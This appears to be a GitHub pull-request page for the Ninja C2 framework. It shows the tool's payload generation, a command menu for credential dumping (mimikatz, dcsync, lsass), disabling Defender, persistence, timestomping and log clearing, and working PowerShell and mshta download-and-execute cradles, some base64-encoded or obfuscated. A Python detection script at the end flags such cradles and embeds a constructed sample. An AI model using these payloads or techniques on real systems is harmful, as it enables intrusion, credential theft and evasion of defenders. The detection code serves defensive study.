ahmedkhlief / Ninja

Open source C2 server created for stealth red team operations

Many changes.. #24

Closed zAbuQasem closed 2 years ago

zAbuQasem commented 2 years ago

Managed file structure

20 directories, 73 files

# Ninja c2
- No more verbose display of payloads
```bash
Ninja|master⚡ ⇒ python3 Ninja.py

    ███╗   ██╗██╗███╗   ██╗     ██╗ █████╗      ██████╗██████╗ 
    ████╗  ██║██║████╗  ██║     ██║██╔══██╗    ██╔════╝╚════██╗
    ██╔██╗ ██║██║██╔██╗ ██║     ██║███████║    ██║      █████╔╝
    ██║╚██╗██║██║██║╚██╗██║██   ██║██╔══██║    ██║     ██╔═══╝ 
    ██║ ╚████║██║██║ ╚████║╚█████╔╝██║  ██║    ╚██████╗███████╗
    ╚═╝  ╚═══╝╚═╝╚═╝  ╚═══╝ ╚════╝ ╚═╝  ╚═╝     ╚═════╝╚══════╝ 
                                                            Version: 2.0
[-] Ninja C2 | Stealthy Pwn like a Ninja

[-] Starting WebServer..
 * Serving Flask app 'core.webserver' (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off

[-] Creating Payloads..
[05:17:55] [+] Raw Payload written to: utils/payloads/Powershell/raw_payload.ps1                                   config.py:67
           [+] Obfuscated payload written to: utils/payloads/Powershell/payload-obf.ps1                           config.py:124
           [+] Stager Payload written to: utils/payloads/Powershell/base64_stager.ps1                              config.py:83
           [+] C# Dropper DLL written to: utils/payloads/Executables/dropper_cs.dll                               config.py:103
           [+] C# Dropper EXE written to: utils/payloads/Executables/dropper_cs.exe                               config.py:108
[05:17:55] [+] Created HTA-Payload                                                                               payloads.py:21
           [+] Created Powershell Start-Job & Start-Process                                                      payloads.py:42
           [+] Created Powershell File                                                                           payloads.py:59
           [+] Created Powershell SCT                                                                            payloads.py:76
           [+] Created Simple Powershell Payloads                                                               payloads.py:101
           [+] Created Powershell Base64                                                                        payloads.py:123
           [+] Created Powershell Base52                                                                        payloads.py:149
           [+] Cmd Shellcodex86 written to:  utils/payloads/shellcodes/cmd_shellcodex86                         payloads.py:198
           [+] Cmd Shellcodex64 written to:  utils/payloads/shellcodes/cmd_shellcodex64                         payloads.py:172
           [+] Word Macro written to:  utils/payloads/Macros/Word_macro.vba                                     payloads.py:227
           [+] Excel Macro written to:  utils/payloads/Macros/Excel_macro.vba                                   payloads.py:241
           [+] Donut Shellcode written to:  utils/payloads/shellcodes/donut_shellcode.b64                       payloads.py:210
           [+] Migrator payload written to: Modules/Migrator.ps1                                                  config.py:145

[-] Loading registered webshell list
[!] Webshell list file doesn't exist.

(Ninja:main)> 

[-] Ninja management

help: Help menu
reset: Clear screen
back: Back to the main
exit: Exit the console , or kill the agent
load: load modules
modules: list all the Available modules in Modules directory
payload: Show Payloads
downloads: list downloaded files

[-] Agents management

list: List all agents
use: Interact with AGENT
kill_all: kill all agents
delete: delete agent from the list
delete_all: delete all agents in the list
set_beacon: set the beacon interval live for agent
upload: upload files to the victim
download: download file from the victim
screenshot: take screenshot from victim machine
split: split file to small size files for data exfiltration (use join command for files in current server or use join.ps1 script to join data on windows )
join: join splited file names ( include the original file name in the path and the script will know the file parts)

[-] Enumeration Commands

get_groups: get all the groups user is member of
get_users: get all the users member in group
processlist: list processes formatted ( Name , ID , Commandline)
kerb: do kerberoast attack and dump service accounts hashes
dcsync_all: do dcsync attack and get all users hashes
dcsync_admins: do dcsync attack against admin users
dumpcreds: load mimikatz and dump credentials
dcsync_list: do dcsync attack against custom user list
bloodhound: run bloodhound to collect all the information about the AD
DA: Run defense Analysis Module
gen_ntlm: generate ntlm hash for given password
lsass_memory_dump: dump lsass memory without touching the disk then parse it and provide credentials

[-] Miscellaneous

encode64: encode any command to base64 encoded UTF-8 command ( can be decoded in powershell)
drm: disable windows realtime monitoring - require admin privileges
unmanged_powershell: run powershell payload through the dotnet agent
persist_schtasks: persistence using schedule tasks
migrate: migrate to new process ( default nslookup ) to hide the backdoor , this command will only work if you enabled donut in campaign creation
webshell_mode: enter webshell mode to register and control your shells)
register_webshell: register webshell to be controlled : register_webshell
time_stomp: change the ( access , modify , creation ) time of destination file as same as the source file ) . Usage time_stomp < source path > < destination path >
clear_all_logs: this command will clear all windows event logs in the system
```

- Nicer way of displaying payloads
```bash
(Ninja:main)> payload

[-] HTA-Payloads
-> mshta https://127.0.0.1:8080/disco
-> powershell -c "mshta https://127.0.0.1:8080/disco"

[-] Powershell Job
-> Start-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVtOZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJveHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vMTI3LjAuMC4xOjgwODAvc2VydmljZScpO0lFWCgkcyk=')))}

[-] Powershell Process
-> Start-Process powershell -ArgumentList "iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVtOZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJveHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vMTI3LjAuMC4xOjgwODAvc2VydmljZScpO0lFWCgkcyk=')))" -WindowStyle Hidden

[-] Powershell File
-> iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVtOZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJveHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vMTI3LjAuMC4xOjgwODAvb3BlcmF0aW9ucycpO0lFWCgkcyk=')))

[-] Powershell SCT
-> iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVtOZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJveHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vMTI3LjAuMC4xOjgwODAvcnNzJyk7SUVYKCRzKQ==')))

[-] Powershell Misc
-> powershell -w hidden "$h = (New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/service');Invoke-Expression $h;"
-> powershell -w hidden "IEX(New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/service');"
-> powershell -w hidden "Invoke-Expression(New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/service');"

[-] Powershell Base64
-> powershell -w hidden "$h = (New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/services');Invoke-Expression $h;"
-> powershell -w hidden "IEX(New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/services');"
-> powershell -w hidden "Invoke-Expression(New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/services');"

[-] Powershell Base54
-> powershell -w hidden "$h = (New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/webserviceclient');Invoke-Expression $h;"
-> powershell -w hidden "IEX(New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/webserviceclient');"
-> powershell -w hidden "Invoke-Expression(New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/webserviceclient');"
-> powershell -w hidden $s=(new-object net.webclient).DownloadString('https://127.0.0.1:8080/uddigui');$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};::Reverse($d);iex([String]::Join('',$d));
```
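From the defender's side, the cradle shapes in the listing above (hidden window, WebClient `DownloadString`, `IEX`, a base64-wrapped stage, remote `mshta`) are exactly what process-creation telemetry should flag. The following is an added example, not part of this PR or of the Ninja code base: it triages constructed process command lines, decodes any `FromBase64String` stage so indicators and the download URL hidden in the inner layer are recovered, and reports which lines deserve a look. The sample command lines, the inner stage text and the indicator names are constructed for the example.

```python
import base64
import re

# Indicator patterns modelled on the cradle shapes Ninja prints in its `payload` listing.
INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(r"\.DownloadString\(", re.I),
    "dynamic_eval":    re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "mshta_remote":    re.compile(r"\bmshta\s+https?://", re.I),
    "base64_stage":    re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)

def decode_stages(cmd):
    """Decode every FromBase64String('...') literal in cmd; skip malformed blobs."""
    decoded = []
    for blob in INDICATORS["base64_stage"].findall(cmd):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded

def analyze_command_line(cmd):
    """Score one command line. Indicators are matched in the decoded stages too, because
    the outer line of a base64 cradle shows little more than IEX + FromBase64String."""
    layers = [cmd] + decode_stages(cmd)
    hits = {name for layer in layers for name, rx in INDICATORS.items() if rx.search(layer)}
    urls = {u for layer in layers for u in URL_RE.findall(layer)}
    suspicious = bool(hits & {"download_cradle", "mshta_remote"}) or len(hits) >= 2
    return {"indicators": sorted(hits), "urls": sorted(urls), "suspicious": suspicious}

def triage(command_lines):
    """Return (index, recovered URLs) for every command line judged suspicious."""
    results = [(i, analyze_command_line(c)) for i, c in enumerate(command_lines)]
    return [(i, r["urls"]) for i, r in results if r["suspicious"]]

# Constructed samples (not copied from the page): a stage shaped like Ninja's base64 stager,
# wrapped the way the Start-Job cradle wraps it, plus a benign admin command as a control.
_STAGE = "$V=new-object net.webclient;$S=$V.DownloadString('https://127.0.0.1:8080/service');IEX($S)"
_BLOB = base64.b64encode(_STAGE.encode()).decode()
SAMPLE_COMMAND_LINES = [
    "powershell -w hidden \"IEX(New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/services');\"",
    "Start-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString("
    "[System.Convert]::FromBase64String('" + _BLOB + "')))}",
    "mshta https://127.0.0.1:8080/disco",
    "powershell -NoProfile -Command \"Get-ChildItem C:\\Windows\\Temp\"",
]

if __name__ == "__main__":
    print(triage(SAMPLE_COMMAND_LINES))
```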